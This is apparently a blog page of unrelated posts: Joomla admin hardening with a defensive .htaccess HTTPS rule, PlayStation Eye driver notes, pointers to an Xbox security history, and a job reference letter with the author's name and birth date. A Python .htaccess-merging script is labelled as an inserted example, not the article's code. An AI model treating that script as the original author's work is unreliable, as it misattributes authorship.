    B. How to store all passwords: create a text file and encrypt it with www.truecrypt.com or www.pgp.com (PGPdisk)
    C. Classes of attacks: I've written a small article listing all web vulnerabilities (HTML partial) and (PDF complete)
    D. Some tools
    • Beyond Compare from www.scootersoftware.com. To deal with the huge number of PHP files contained in Joomla/Mambo, and to install patches or synchronize folders more easily, I strongly recommend you try or buy a Beyond Compare licence. This tool is able to compare directories, preview changes, and even compare a local directory with a remote FTP server.

    E. HTTPS rewriting for the admin panel: create a file .htaccess and copy it into /administrator; if a file already exists (it should!), add the lines which are missing

    # Do not allow any user to access this file - to copy in all .htaccess
    <Files .htaccess>
    order allow,deny
    deny from all
    </Files>

    #/administrator/.htaccess
    RewriteEngine on
    RewriteRule ^/$ /administrator/index.php
    RewriteCond %{SERVER_PORT} !443$
    RewriteRule ^(.*) https://www.waltercedric.com/administrator/$1 [R=301,L]
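    Annex E says to add whatever lines are missing to an existing .htaccess. The script below, an added Python example rather than the article's own code, does that merge and also reports whether a file forces HTTPS. It treats a <Files>...</Files> block as one unit and each other directive as its own unit, compares them case-insensitively, and leaves an existing .htaccess block alone whatever it contains. The directory rule uses `^$` because in .htaccess context the per-directory prefix is stripped before matching; the hostname is the one on the page and the function names are my own.

```python
"""Merge the annex E directives into an existing /administrator/.htaccess.

Added example, not code from the article.  A <Files>...</Files> block is one
unit, every other non-comment directive line is its own unit, so re-running
the merge never duplicates lines.  The hostname is the one used on the page."""

# Directives from annex E.  `^$` rather than `^/$`: inside .htaccess the
# per-directory prefix is stripped before matching, so the directory itself
# is the empty string.  (Apache 2.2 access-control syntax, as on the page.)
REQUIRED = """\
# Do not allow any user to access this file - to copy in all .htaccess
<Files .htaccess>
order allow,deny
deny from all
</Files>

#/administrator/.htaccess
RewriteEngine on
RewriteRule ^$ /administrator/index.php
RewriteCond %{SERVER_PORT} !443$
RewriteRule ^(.*) https://www.waltercedric.com/administrator/$1 [R=301,L]
"""


def parse_units(text):
    """Split .htaccess text into units: a <Files>..</Files> block is one unit,
    any other non-comment directive line is a unit by itself.  Whitespace is
    collapsed so indentation differences do not cause false duplicates."""
    units, block = [], None
    for raw in text.splitlines():
        line = " ".join(raw.split())
        if not line or line.startswith("#"):
            continue
        if block is not None:
            block.append(line)
            if line.lower() == "</files>":
                units.append(tuple(block))
                block = None
        elif line.lower().startswith("<files"):
            block = [line]
        else:
            units.append((line,))
    if block:  # unterminated block: keep what we have rather than drop it
        units.append(tuple(block))
    return units


def _key(unit):
    """Case-insensitive identity of a unit; a <Files> block is identified by
    its opening tag only, so an existing block is never replaced or doubled."""
    first = unit[0].lower()
    return (first,) if first.startswith("<files") else tuple(l.lower() for l in unit)


def merge_htaccess(existing, required=REQUIRED):
    """Return `existing` with every unit of `required` that is not yet present
    appended.  The input comes back unchanged when nothing is missing."""
    present = {_key(u) for u in parse_units(existing)}
    added = []
    for unit in parse_units(required):
        if _key(unit) not in present:
            added.extend(unit)
            present.add(_key(unit))
    if not added:
        return existing
    head = existing.rstrip("\n")
    return ((head + "\n\n" if head else "")
            + "# added: admin panel HTTPS + self-protection\n"
            + "\n".join(added) + "\n")


def forces_https(text):
    """True when a RewriteCond on the port (or on %{HTTPS}) is directly
    followed by a RewriteRule that redirects to an https:// URL."""
    lines = [u[0] for u in parse_units(text) if not u[0].lower().startswith("<files")]
    for cond, rule in zip(lines, lines[1:]):
        c, r = cond.lower(), rule.lower()
        if (c.startswith("rewritecond") and ("443" in c or "%{https}" in c)
                and r.startswith("rewriterule") and "https://" in r):
            return True
    return False


if __name__ == "__main__":
    # Constructed sample of a pre-existing file that already switches the engine on.
    sample = "RewriteEngine On\nRewriteBase /administrator\n"
    print(merge_htaccess(sample))
    print("forces https:", forces_https(merge_htaccess(sample)))
```

    Run the merge over the text of the existing file and write the result back; because each directive is compared as a unit, running it a second time changes nothing, and an `RewriteEngine On` already present is not duplicated.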

  • sony_playstation_eye

    The PlayStation Eye is a webcam device by Sony Computer Entertainment for the PlayStation 3 video game console. It is the successor to the EyeToy for the PlayStation 2. In case you have one floating around that you do not use for gaming, why not try using it as a webcam? You can find them cheap everywhere on ebay, ricardo.ch, leboncoin.fr

    It is no longer difficult to make this webcam work under Windows (Sony has sold this camera since 2007), as good and stable drivers are now available. I did test the webcam under Windows 7 64-bit and Skype. It works great as long as there is enough light in the room. Note that the multi-directional microphone is of quite exceptional quality (the PS3 uses it for voice location tracking, echo cancellation, and background noise suppression).


    Features


    Windows XP, Windows Vista, Windows 7

    The CL-Eye Platform Driver recommended for general users provides audio/video functionality with a single CL/PS3-Eye camera supported in a wide range of native and web applications that use Microsoft Windows DirectShow Framework (Skype, YouTube, Adobe Flash, AIM, MSN Messenger).

    MacOS

    A working driver for MacOS can be downloaded from http://webcam-osx.sourceforge.net/

    Linux

    Starting with Linux kernel 2.6.29, just plug your PlayStation Eye into a free USB port and enjoy. Tested under OpenSuse 10.2


  • The free60 wiki, which aims to document ways of booting Linux on the Xbox 360, has been online for two weeks and already has some interesting info. (Some guys are really a lot crazier than me ;-) )

    I came one more time to XBOX-linux.org, which has a page describing how the first Xbox was hacked. Very technical, but a must-read for every security geek.

    The Hidden Boot Code of the Xbox, from Xbox-Linux, or "How to fit three bugs in 512 bytes of security code"

    ...
    Microsoft's engineers first seem to have thought that the secret key would never be revealed: security by obscurity. This explains why the decrypted code did not get hashed. Once the secret key was known, anyone could decrypt, patch and reencrypt the flash contents.
    ...
    And how the chain of trust was broken
    ...
    The design of the first MCPX was very wrong, and the implementation was catastrophic. The design of the second version was a lot better, but the implementation was not. Without the various security holes (Visor and MIST bugs as well as possibly more) and with a working hash function, the system would have been pretty secure. Encrypting the ROM contents with a secret key, i.e. security by obscurity, simply does not work if the key travels over a bus that can be sniffed.



  • Mr Cédric Walter, born on 3 October 1973, has been employed by our insurance company since 1 March 2000. For the period from March 2000 to June 2004 we refer to our interim reference of 30 June 2004.

    As an application developer in the Applications Basel department, Mr Walter essentially performs the following tasks:

    • Use, further development and specialisation of group-wide eBusiness platform components
    • Programming of eBusiness insurance applications using J2EE, XML, JSF (program for quote preparation in the individual life insurance area)
    • Maintenance and further development of the new infrastructure for the development of the individual life quotation system
    • Participation in the evaluation of a new development platform for the development of the new presentation layer of the individual life administration system
    • Know-how transfer and support of ongoing projects.

    We know Mr Walter as a conscientious and exceptionally trustworthy and responsible employee. He has outstanding specialist knowledge and above-average technical abilities, which enable him to solve even very difficult tasks. He always has excellent ideas, gives valuable suggestions, independently takes all necessary measures and carries them out successfully. Mr Walter is resilient and delivers very good performance even under difficult working conditions.

    Through his cooperative and friendly manner, Mr Walter is valued and well liked by superiors, colleagues and customers.

    We issue this interim reference on account of a change of supervisor that took effect on 1 January 2007. We thank Mr Walter for the valuable services rendered so far and wish him continued success and satisfaction.

    Helvetia Versicherungen.
    Human Resources + Services
    Dominique Bruat
    Team Leader Applications Basel
    Monika Haering
    Head of Personnel


    Basel, 31 January 2007